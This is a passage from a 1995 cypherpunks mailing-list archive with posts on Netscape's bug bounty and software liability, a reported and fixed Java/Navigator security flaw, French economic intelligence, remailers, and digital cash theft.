>> What would you
>> rather see?  A company makes a beta release for people to attempt to
>> break, fixes the bugs, and then releases a better product?  Or would
>> you rather see a company release a product, tell people it is secure,
>> and then get bitten by numerous holes in it?
>
>Well, I'm not sure that I'd want to make any representations or imply any
>warranties whatsoever. 

Ahhh.... this sort of thinking really lets the user down.

The reason Netscape (et. al) has market capitalisation is because they sell
their product to us, the users. It is a bit of a worry if software authors
can write and then release for sale "buggy" software, and hide safetly
behind "I make no warranties etc."

To adopt an analogy... would you be happy to buy a car from Toyota (or
whoever) if they were allowed to hide behind a warranty disclaiming
liability should it break down (or blow up)?

Somewhere along the lines, those who make their money selling software
should have to be responsible for bugs.

Thoughts?

Mark Neely



___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 10:40:35 PDT
To: cypherpunks@toad.com
Subject: [Honk] FR $ec vs US $ec
Message-ID: <199510161740.SAA11885@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Excerpted from: URL: http://www.oss.net/zhi/95-7-oss


                OSS Notices, July, 1995

       France Identifies USA as "Main Adversary"

The following material is so important that we have
chosen to reprint it in its entirety from Intelligence
Newsletter, which we continue to recommend highly.  Call
them at (33 1) 44 88 26 10 for a sample issue or to order
your subscription.

            FRANCE: Ringing the Alarm Bells

"For the first time in France, a boss of the country's
Direction de la Surveillance du Territoire (DST) spoke in
public at a seminar on the theme "Companies and Business
Intelligence" that was laid on by the Institute des
Hautes Etudes de Defense Nationale (IHEDN) at the French
Senate on July 4.  As he himself declared on the
occasion, Philippe Parant agreed to speak out 'despite
the special nature' of his functions in order to alert
French business circles of the dangers of 'economic
warfare'.  To be sure, the main aim of the gathering
which drew a full house was to ring the alarm bell. 
According to Gen. Bernard Norlain, head of IHEDN,
economic warfare now forms part and parcel of 'an overall
approach to defence'.  IHEDN will dispense a course on
business intelligence to 30 high-level trainees in the
fall.

"Most of those who spoke at the seminar identified the
U.S. as both the main adversary in the war and the best
model of how it is fought.  This was especially the case
of Francois David, head of French export credit guarantee
agency COFACE who said the only response to the U.S.
'could be European' in scale.

Elsewhere, Remy Pautrat, deputy dead of France's
Secretariat General de la Defense Nationale (SGDN) paid
tribute to the French  president for signing a decree on
April 1 that gave birth to a Comite pour la Competitivite
et la Security Economique under the authority of the
French Prime Minister.  Pautrat said the Committee formed
"the nerve center of a more ambitious system" that was
currently being set up, partly in secret."

             FRANCE-the DST's New Defences

"During the seminar cited above DST chief Philippe Parant
reckoned that economic, scientific, and industrial
espionage had increased considerably over the past few
years.  It now accounted for 60% of cases that come to
the authorities' attention compared to 40% for political,
diplomatic, and military spying. Methods had also changed
because state-sponsored espionage had increasingly taken
a back seat to a type practices by private intelligence
companies, international audit firms, head-hunter
concerns, as well as insurance and reinsurance companies. 
Parant said that effective defence against the onslaught
could not come from government services alone.  "If that
were the case the game would be lost in advance," he 
declared.  He suggested that as many staff as possible in
big companies be made aware of business intelligence
concerns.  In addition he called for "genuine
information-management training in engineering
universities."  For maximum impact, he said, such
training should not be dispensed by security services but 
rather by specialists in each specific discipline."

                L'Expansion Cover Story

With the above background in mind, we can now better
understand the cover story in L'Expansion of 10-18 July
1995.  This prestigious journal, widely regarded as the
French equivalent of Forbes, Fortune, and Business Week,
appears to have been manipulated by French civilian
intelligence and self-promoting private sector business
intelligence activities.

The cover story of L'Expansion is nothing less than a
call to arms for the French business community, and the
opening declaration of war on the United States of
America.  Unfortunately, this article was very likely
drafted in active cooperation with French civilian
intelligence experts, and should be considered a "covert
media placement".

I have taken a personal interest in the article because
it links me with President William Clinton, Director of
Central Intelligence John Deutch, and the founder of
Kroll Associates, Jules Kroll.  I am honored.  Sadly, the
article, while identifying me as the apostle of open
source intelligence, is gravely in error when it
identifies me as the linch-pin for a new covert strategy
to undermine the French economy, and also alleges that 
I have been actively discouraged from implanting myself
in France by the French authorities.

There are three "realities" that need to be explored
here.  First, there is a budget battle going on in
France, and the French civilian intelligence services are
doing everything they can to "hype" the threat and obtain
increased manning and funding.  This should not surprise
us, but the apparent subversion of the previously
prestigious journal L'Expansion to the desires of French
civilian intelligence, is cause for concern.
Second, my sources in France tell me that the larger
French companies, especially those in the defense sector,
do not take this threat seriously because they are much
superior to U.S. companies at the business of industrial
espionage.  A very well-informed source has suggested to
me that this cover story is the result of an alliance
between French civilian intelligence (attempting to
increase its budget) and General Pichot-Duclos of
INTELCO, who is attempting to increase his business
practice among the small businesses in France foolish
enough to believe in this exaggerated threat.

Finally, for the record, I wish to note that I was
invited to France by Mr. Francois Leotard, the Minister
of Defense, with the explicit approval of Prime Minister
Balladur, in order to join Admiral Pierre Lacoste,
General Jean Heinrich, and General Jeannou Lacaze in
speaking to a very select group of 300 French leaders
from government, industry, and the  academy on 23 October
1993.  We spoke about the need to reinvent intelligence
and significantly increase reliance on open sources.  The
presentations that these distinguished flag officers and
I made have been published in a book  called Defence and
Intelligence, available (in French) from Editions
L'Harmattan, 5-7, rue de l'Ecole-Polytechnique, 7500
5 Paris.


Robert D. Steele, Publisher

Open sources Solutions, Inc.
International Public Information Clearinghouse
11005 Langton Arms Court, Oakton, Virginia 22124-1807












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:22:47 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
In-Reply-To: <199510151421.HAA08833@jobe.shell.portal.com>
Message-ID: <30830CB4.7C6F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com wrote:
> After emailing the company more than two days ago, I would hope that a
> communications channel would have been opened, or alternatively I would
> have held out a hope that someone from Sun or Netscape might have made an
> official comment here or publically.  I would have expected something
> other than a stone-walling silence.
> 
> My Friday the Thirteenth post obviously has people shaken. Clearly, Friday
> was not the day to comment about this serious problem.  There was no
> utility in causing panic and disrupting trading in Netscape stock,
> especially in a market that can only be characterized as frothy.  But now
> here we stand, many hours and days later, with the questions raised
> remaining unaddressed, and with my copyright restriction on my Friday
> post hereby, and herein explicitly waived.

  I'm not really sure what you are talking about.  Are you referring
to the bugs that were reported here, and have since been fixed, or
are you talking about something new.

  Who at netscape did you e-mail?

  What Friday the Thirteenth post are you referring to?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 16 Oct 95 19:04:20 PDT
To: cypherpunks@toad.com
Subject: Re: Bug Bounty [noise]
Message-ID: <199510170204.TAA12213@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 10/16/95 -0700, you wrote:
>Alan Olsen wrote:
>> 
>> Something I noticed about the Netscape Bug Bounty that seems to not have
>> been mentioned here...
>> 
>>         "Linux users need not apply."
>
>  If a linux user finds a security hole that is reproducible in
>any supported version then they are still eligible for the prizes.
>If a linux user finds a security hole that only applies to linux,
>I don't know what the company would do, but I would push for them
>being payed as well.

If you look at what versions are eligible for rewards of any sort, Linux is
not on the list.  Was it an oversight or are they only eligible for the
security cash?


|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 16 Oct 95 19:28:39 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510170227.TAA27532@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>         The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offerring
> a tee shirt is down right offensive.
> 
>         I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:

      [snip of judging, verification, bidding ...]

Hmmm.  I'm glad that some people still have a bit of a sense of haha about
these things.  It's only computer code, right?? 

Right??  ;-(

Your idea about a bidding war for this type of code is _interesting_ but
not something I'd really like to see develop.  Good security and good code
are possible without this. 

Good people are out there.  The *best* people might be in academia or they
might be in retirement or even on a sabbatical.  They might even be in
other fields, or other countries, or as Netscape discovered to its
chagrin, they might be Berkeley students.  The question is how to secure
co-operation when they aren't motivated by ego, need, or greed. 

How do you attract the ones who simply know who they are, and WHAT they
can do, and simply won't put up with twaddle?? 

And frankly offering someone a cup, or a shirt or even offering someone a
$1,000 isn't the way to bring them on side.  I can't even get my
lineprinter serviced on Christmas Eve for $1,000. 

There's always a fine line between an insult and an offer. 

>         I have an even better idea.  How about if Netscape gets some
> competent programmers with real security expertise, adds in some good
> change controls, a serious internal testing program, quality control ala
> ISO-9000, internal IT auditors, external IT auditors, training and
> education for their employees, and everything else it takes to be in the
> software business in a serious way.

This would be a *basic* start.  Whether or not ISO-9000 is the way to go,
or whether it should be TQM, or something more modern is moot.  In
addition to some of the above, I might suggest parallel development units. 

Two separate program teams kept completely apart from each other, each
duplicating the other's work with the eventual goal of utilizing the first
reconciliation sets of production code as "learning experience", and then,
as part of a planned design goal re-evaluation and refinement, disposing
of the reconciliation set before "Fresh-Start"(TM) implementation. 

(This might necessarily lead to attendant presentation of individual
outplacement opportunities to select persons, as a team regrouping
component.)

Essentially a real-life simulation of the anticipated code-writing
process. 

Each group could develop its own unique vision and approach within the
context of the design goal, and should have demonstrated a willingness to
utilize challenge and justification modelling.  The groups themselves
might be dynamically balanced and re-balanced vis-a-vis personality and
code-writing styles. 

A positive creative environment should be provided, possibly in an
incubator-type setting, which meets creative, psycho-social, and
psycho-physical requirements. 

Essentially, the right balance between spa and boot-camp, a realized
vision.  An evolutionary development of Scott Adams' "Vision: Empowered
Employees Working Toward A Common Plan". 

A plan that centers around People. 

A New Plan that views employees as assets to be developed, nurtured, and
cared for rather than as expenses to be eliminated or reduced. 

A New Vision emphasizing Quality by remedying the marginalization of the
companies prime assets -- the employees.  An applied corrective ...  a
focussed deemphasis on productivity in anorectic organizations.  I might,
humbly, suggest as a title: 

 A New Vision, A New Plan:  Applied Complexity Theory (A.C.T.) in Action.

It truly is a long list ... as part of an "ACT in Action Plan"(TM),
Netscape should source long-range planners who can meet and exceed
day-to-day corporate expectations. 

>         As an alternative, we could help them contact the shareholders
> for a lawsuit.  After all, they are a public company now and are responsible
> to the shareholders for the value of their stock.  If it goes down because
> they aren't doing an adequate job of software quality control, the officers
> may be personally liable.

I think whether or not it goes down, is not relevant.  If there has been
proper material event disclosure, then I doubt that there are actionable
grounds.  If there has been active acts of misrepresentation, then that's
simple fraud. 

Fiduciary obligations can be very complex without good counsel. 

Clearly by not having official announcements, it might lead a reasonable
man to believe that there might be trading improprieties through-out the
high-tech sector, among so-called "friends and family" or alternatively,
that Netscape's strategic misrepresentation program might be operative. 

Who know's??

One thing is certain though, disclosure obligations attach to all public
companies.  Sun, Microsoft, Netscape, AT&T, Viacom ... 

Maybe I should email postmaster??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 16 Oct 95 16:51:36 PDT
To: bshantz@nwlink.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510151627.AA15802@toad.com>
Message-ID: <TAA25593.199510162351@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510151627.AA15802@toad.com>, "Brad Shantz" writes:
[the stuff with ">>" is mine]
>> Note well: Netscape is offering this reward for finding bugs in *beta*
>> release code.  In other words the code that they *know* crashes, code
>> that they susspect has security releated bugs, code that they don't think
>> is (yet) good enough to charge a mesely $40 for!
>
>Whoops, wrong.  BETA does not mean code "they know crashes."  In fact 
>it is quite the opposite.  This is pre-release code that they are bug 
>fixing.  most of the catastrophic bugs, they probably know about.

I would agree that they know about many catastrophic bugs, perhapse
even most, perhapse not.  That doesn't mean they have been fixed.

I have been involved in a fair number of beta test programs (as a
tester for the compony relasing the product, as a programmer for
the compony relasing the product, and as a user recieveing the
product to be tested).  Most had catastrophic bugs (varying from
crashing for programs written in C, to kicking you out of the run
time enviroment for programs witten in APL) that were known about
when the product was shipped to testers.  The others we had absoultly
no doubt that such bugs would be found by testers.

Perhapse Netscape is diffrent, but I don't see why they would be.
Certinally I can make Netscape 2.0b1 crash, and I doubt people at
Netscape were foolish enough to think that it wouldn't.

>BETA program is to increase the testing and quality assurance staff 
>to find all of the bugs they DON'T know about.  Then, they will have a 
>reasonable amount of time to fix those bugs before release.  It makes 
>for a much more stable product.

Yes the principal reason for having a Beta is to find bugs you don't
know about.  That does *not* mean you need to remove all known bugs
before you start the Beta ('tho it does cut down on the number of
duplicate reports - many testers fail to read the known bug list).

There are also some less noble reasons to have a Beta (like the
PERT chart says the Beta starts October 8th or the project will
start to slip, and many more).  There is no real evidence that
this applys to Netscape so I won't go into them.

[...talks about SPRY/Compuserve and Logos Research and Microsoft's
beta programs...]
>Anyway, I see Netscape's move to paying for beta testing will result 
>in a more stable browser, and hopefully more secure software.

Yes, and this would be diffrent from my point of view in what way?
(i.e. I agree and wonder why you botherd to mention it)

>> If they don't get buried in bad press for this, I would guess that they
>> may have a diffrent program with a diffrent set reward for finding bugs
>> in their for-sale version.  
>
>Why would they get bad press?

Well a number of people on this list seem to be pooh-pooing the reward
program.  Rightfully or not that could gennerate bad press.  Also
reporters have their own set of thought processes and may decide this
is bad for some reason.  Or not.

>> Besides nobody said you have to report your bugs to Netscape just because
>> they gave you free software and offered some sort of reward for finding
>> bugs.  If you don't think the "pay" (including the posability of having
>> the software fixed) is high enough, don't report the bugs.
>
>Once again, Josh, I'm afraid I have to disagree with you on this one. 

Ok, go ahead.

> Especially in regards to secure software.  I see your point, but...
>Whether or not you have to report the bugs is immaterial.  Netscape 
>is doing a service by making their app available for testing before 
>saying "this is secure."  As a person who does business over the net, 

(I'm not sure they have ever gone out and said the Beta software isn't
secure.  Hopefully people realise that beta code doesn't allways do
everything it hopes to, and will not assume it is secure just because
it has a goal of being secure.)

>if I found out that my software was NOT secure, I would seek either a 
>secure update or another company's software.  If  I'm happy with 
>Netscape's software, I'll report the bugs to improve it's quality.  
>In my humble opinion, improving the software is reward enough.  Very 
>few companies have paid beta programs.

Again I agree.  In fact I think the $0 they were paying before the
reward program was enough that I sent in reports on anything I could
reproduce.

You havn't done a very effictave job of disagreeing with me.  I
said Netscape offers you X in exchange for Y, and if X isn't enough
for you do want to do Y, then don't do Y.  You said X is a very
good offer for Y, and you intend to take them up on it.  The two
are not mutually exclusave (in fact the two views are somewhat
supportave of each other).  

Which ones of us doesn't understand the other?

[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Mon, 16 Oct 95 20:33:59 PDT
To: cypherpunks@toad.com
Subject: Empennage Seminar -- Sun Microsystems
Message-ID: <v01530508aca8def27b2b@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Seen on ba.seminars and posted here:


              Mathematical Sciences Research Institute
                          Empennage Seminar


                   An Introduction to Cryptopolitics

                          Whitfield Diffie
                          Sun Microsystems
                     Mountain View, California

    Some years ago, Andy Gleason observed that during World War II,
the physicists had discovered that what they did had an impact on the
real world and that now it was the mathematicians turn.

    The talk will explore why seemingly arcane technology has become
a political football.  We will examine the significance of
communications privacy in human affairs, how communications
intelligence functions, and how cryptography affects that functioning.
In the process we will look at a variety of proposals for controlling
cryptography and the possible impact of those propsals on
intelligence, law enforcement, commerce, and the personal life.

            2 PM, Tuesday October 24, 1995, MSRI Lecture Hall

Next Month:

Scott Mitchell, Sandia National Laboratories, on hexahedralization

#####################################################################

About Empennage

        As part of our effort to build bridges between Mathematics and the
larger world, the Mathematical Sciences Research Institute is sponsoring
a seminar where mathematicians can meet adventurers on the technological
frontier. The Empennage Seminar will meet in the MSRI lecture hall
Tuesday afternoons from 2 to 3.

        The seminar is intended to bring together not only scientists
from the Bay Area involved directly with mathematical computing, but
also people involved in envisioning and implementing new technologies,
people concerned with the social and political ramifications of the
development of information technology, and people working on problems,
the formal nature of which brings them close to mathematics. The
seminar is aimed at breaking down the walls which in this century
have isolated mathematics from intellectual life outside of its own
tradition.

        While the Empennage seminar is still in its infancy, we have
begun to attract an audience beyond MSRI, including scientists from
other institutions and disciplines, both within and without academe.
If you have any recommendations for possible speakers, please let me
know. Also, anyone interested in attending should contact me:
Joe Christy, joe@msri.org, (510)643-6069.

About MSRI

        The Mathematical Sciences Research Institute (MSRI) is an
independently funded research institute located on the UC Berkeley
campus, high above the Lawrence Hall of Science. At any given time,
MSRI is host to 50 to 100 post-doctoral fellows and more senior
researchers who come from all over the world for periods of a week to
a year. Most of them participate in one of two topical programs which
change from year to year, with a smaller group in "Area III", our
catch-all. Currently the programs are Holomorphic Spaces and
Several Complex Variables.

        MSRI is aiming to become a model site for the integration of
computing into mathematical research. In practical terms this means
not only the development and use of software for numerical
calculation, symbolic manipulation, and geometric visualization, but
also exploration of the uses of technology in other areas of scholarly
life. This includes network access and distribution of structured
information, new modes of scholarly communication (incorporating Email,
formatted and illustrated mathematical text, and shared interactive
software for experimental mathematics), and the development of software
engineering tools necessary to put the creation of useful, shareable
special purpose software within the reach of the average individual
scientist.

directions to MSRI are available at the URL:
http://www.msri.org/housing/info/howtoget.html

About the word "empennage"

Empennage is the French word for fletching - the act of putting
feathers on the tail of an arrow. This makes the arrow fly strighter
by giving it a spin.

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 16 Oct 95 20:34:53 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <Pine.SUN.3.91.951016074023.1719B-100000@crl.crl.com>
Message-ID: <Pine.SOL.3.91.951016203438.582A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Oct 1995, Sandy Sandfort wrote:

> 
> This is only true if you assume everyone will do their own
> reputation evaluation.  This is a third-party insurer problem,
> really.  Either a "Lloyds of London" or a "Good Housekeeping" 
> model would do the trick.
> 

Actually, this sounds a lot closer to someone like S&P or some other 
rating agency.

Simon

------
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Mon, 16 Oct 95 18:19:07 PDT
To: williams@va.arca.com
Subject: Security Spectra
Message-ID: <Pine.3.89.9510162030.C20974-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


In your recent post to the cypherpunks mailing list you proposed a 
taxonomy of security weaknesses and vulnerabilities, adding that these 
may be perhaps categorized and ranked.  Standard practice in the computer 
and communications security business has for many years been based on the 
idea of risk analysis.  More or less systemmatic approaches to risk 
analysis have been put forward over the years.  One example is FIPS Pub 
65 which attempted to systematize risk analysis and ideally lead one to a 
quantified level of risk at the end.  The method was too burdensome to be 
effective, and most people today use a more qualitative approach.

The whole idea of categorizing or ranking holes and vulnerabilities ab 
intitio, outside of their contextual application to a real system is not 
very helpful.  Systems vary so widely in their criticalities, 
sensitivities, costs, etc., that each of your pre-defined categorized 
weaknesses would have to be rejudged - in the context of the system being 
analyzed - to determine how, and to what extent it could effect the system.

For example, a system with a weakness in logging events would be a disaster 
in a busy commercial transactional system that may need logs to recover 
from errors or to trace mischievious actions.  Another system, however, 
may find the lack of effective logging an inconvenience at worst (maybe 
even a plus, if the Pennsylvania cops are at the door).  The standard 
approach as I understand it is to analyze the system against all the 
known vulnerabilities and attempt to measure (maybe only qualitatively) 
the risks associated with the vulnerabilities.  I think analyzing holes 
by themselves, outside of any context, is a good academic exercise, and 
may lead to useful knowledge that people analyzing real systems can use, 
but it is not an advantage to attempt to grade them in the abstract.

--
PJ

you'll probably get lots more useful advice from others more articulate 
than I, but I hadn't posted to the list in awhile and am curious about 
how all these bounce messages everyone is talking about. Are there lots 
others besides the guy with 1000 messages in his mailbox?  I guesss I'll 
see.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 16 Oct 95 18:31:58 PDT
To: cypherpunks@toad.com
Subject: PGP article in American Survival Guide
Message-ID: <Pine.SOL.3.91.951016212341.571F-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


There's a brief intro article re. PGP in the issue of *American Survival 
Guide* which is currently on the stands.

ASG has a sort of cammo-right orientation, FWIW.

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AFDA2@aol.com
Date: Mon, 16 Oct 95 20:46:41 PDT
To: lindat@iquest.net
Subject: Seminar
Message-ID: <951016233125_125652326@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


A quick update on the Association's upcoming seminar.

As many of you know, on Saturday, November 4, 1995, the Association of
Federal Defense Attorneys (AFDA) will be presenting a one-day seminar for
defense attorneys entitled, "What Every Defense Attorney Should Know About
The Federal Bureau of Prisons."  The seminar will be held at the Los Angeles
Airport Marriott Hotel, from 9:00 a.m. - 4:30 p.m.  


The purpose of the program is to provide defense attorneys with two avenues
of insight into BOP. The first, which covers the morning and part of the
afternoon, focuses on the administrative/policy-oriented makeup of the
agency, and the defense attorney's strategic application of these rules.
 Speakers from the BOP, private defense bar and Federal Public Defenders
Office will cover the following subjects: 

1. Types of BOP facilities, including the key operating features of the USP,
FCI and camp.

2. The flow chart of key players in BOP administration that attorneys should
be familiar with, including the Community Corrections Manager, Community
Corrections Staff, Regional Designator, and the legal offices at the various
facilities and regional offices such as Dublin, Ca.

3.The BOP documentation system, which has its own unique classification and
numbering system.  This topic includes special attention to the key documents
most likely to affect defense attorneys, such as Program Statements,
Operations Memoranda, and Directives.

4. The key BOP terms that attorneys should be familiar with in order to
communicate more effectively with staff and understand better the agency's
documentation.

5. How to anticipate where the defendant will serve his/her sentence and
secure a favorable outcome (to the degree possible).  This subject includes:

Designation of place of confinement
Custody classification
Institutional transfer and redesignation

6.  Sentence computation (calculating release dates)
7. How to efficiently contact appropriate staff on matters of concern
8. Intensive Confinement Centers (boot camp)
	
     The second prong of the seminar, which covers about two hours in the
afternoon, focuses on the "grass-roots" perspective of the federal inmate, in
terms of basic facts about federal incarceration that lawyers need to pass on
to their clients before the clients are designated to a facility.  The
speakers will be two former inmates who have done time at camps and FCIs.  

If you would like a fax-flyer for the program, email us a short note at
AFDA2@AOL.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Tue, 17 Oct 95 00:19:40 PDT
To: cypherpunks@toad.com
Subject: java flaw
Message-ID: <9510170659.AA29634@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Sun and Netscape fix Java-Navigator flaw

From PC Week for October 16, 1995 by Michael Moeller

Netscape Communications Corp. has identified a flaw in Sun Microsystems
Inc.'s Java development language that caused a security hole in
Netscape's Navigator 2.0 Internet browser.

The flaw left open the possibility for corrupted files or viruses to be
downloaded over the Internet to a host PC.

Netscape officials, in Mountain View, Calif., said the problem occurred
when porting Java to the Netscape platform.

Sun, also based in Mountain View, issued a fix that performs a tighter
security scan of Java applets, or portions of code. Sun officials said
no users were affected by the security flaw.

The company is beta testing Java now, and the final version is scheduled
to be released next month.

Ironically, Java was designed as a secure development language to
prevent users from contracting a virus when downloading an application
over the Internet.

With Java, World-Wide Web application developers can create applets that
are turned into full-scale application code once downloaded by a Java-
enabled browser.

A security feature in Java scans for viruses before activating the
applet.

Java applications are designed to be run within the secure environment
of a Java-enabled browser.

When Java was ported to Netscape, one of the security features "fell
through the cracks," said Arthur van Hoff, senior staff engineer at Sun
and a principal architect of Java.

As a result, a user could have downloaded a corrupt applet that could
have continued to function outside the secure environment of the browser
shell and infected other programs on a user's computer.

Netscape has since released two new versions of its Navigator 2.0
browser for beta testing, one with Java support and one without.

However, Netscape officials said that once the browser is released in
mid-December, all versions of Navigator 2.0 will be Java-enabled.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 17 Oct 95 08:05:25 PDT
To: cypherpunks@toad.com
Subject: Re: java flaw
Message-ID: <199510171504.IAA17210@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
> A security feature in Java scans for viruses before activating the
> applet.

I hope that this is false.

Even if one had genuine artificial intelligence, it would be impossible
to detect all viruses, only particular viruses and classes of virus.

If Java is secure, virus scanning should be unnecessary, indeed 
impossible, because there could be no code configuration capable
of acting as a virus.

If virus scanning occurs, then it is possible to write a virus in Java,
then Java is inherently insecure.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 17 Oct 95 06:13:48 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The NSA Visits Compendium
Message-ID: <199510171312.JAA15286@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:05 PM 10/16/95 -0700, Vladimir Z. Nuri wrote:
>a study on this would be very significant. (from what I understand, the NSA
>tried to do this with public key crypto, i.e. suppress it at the
>publication stage. a professor gave a lecture on this in one of my
>classes and said that it was even covered in the NYT at the time.
>unfortunately I lost the date. I believe it was a long time ago
>(maybe the 80's or even the 70's). hopefully someone else has an
>encyclopedic brain.

1977/1978.  "A Proposal for a Public Key Encryption System."  IEEE meeting.
Imprisonment threat by letter.  Mathematical Games column in Scientific
American.  3,000 copies of paper distributed free by MIT.

>unfortunately, whenever someone says, "don't name my company", it loses
>effectiveness. I would like to point out that people are directly contributing
>to their erosion of rights by this behavior that suggests that they
>doing something lawbreaking that they are ashamed of.

One should always suggest to investigating authorities that they show a
warrant or get lost.  "Quo warranto"?  It is rarely useful to chat with them.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 17 Oct 95 06:17:05 PDT
To: DMiskell@envirolink.org
Subject: Re: Weekly MixMaster list
Message-ID: <199510171316.JAA15754@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At , Daniel Miskell wrote:
>
>What is the MixMaster list, and what is it for?
>Apologies on my newbie status.
>
>Munster

Mixmaster is a modern remailer protocol which breaks packets up into
standard sizes and shuffles them among active remailers to make traffic
analysis impossible.

The list lists active mixmaster remailers.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Tue, 17 Oct 95 06:54:28 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510141243.IAA27588@hammond.cis.ohio-state.edu>
Message-ID: <199510171354.JAA13063@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
 > Nathan Loofbourrow writes:
 > >It may be that the approach is off anyway. Credit cards have only
 > >signature verification -- if the salesperson bothers -- because stolen
 > >cards are reported. You don't need a strong authentication technique
 > >if a stolen card is easy to cancel.
 > 
 > The card's easy to cancel, but the cash ain't.  Credit cards are
 > cleared with the issuer.  Digital cash with smart cards acting as
 > transaction observers don't need this.  The thief need only transfer
 > the cash from the stolen card to his own, just like he does with
 > regular cash.

Er, um, right.

Well, then, perhaps on-line systems need to consider cash
revocation in case of theft. Actually, this is a no-brainer: just
exchange the cash for some new coin, and the old stuff goes
invalid. Admittedly, this means a footrace for the mugger and the
victim, so I guess the mugger is encouraged to knock you out cold.

Maybe you just shouldn't carry too much cash with you. Gee, that
sounds like good advice even without digital protocols.

 > >Even with a weak PIN system for authentication, you can always provide
 > >a "duress" PIN, right?
 > 
 > Sounds like a better choice.

Duress PINs liberally sprinkled through the keyspace also drop the
efficacy of brute-force PIN search for the thief.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Tue, 17 Oct 95 02:32:37 PDT
To: Peter Wayner <pcw@access.digex.net>
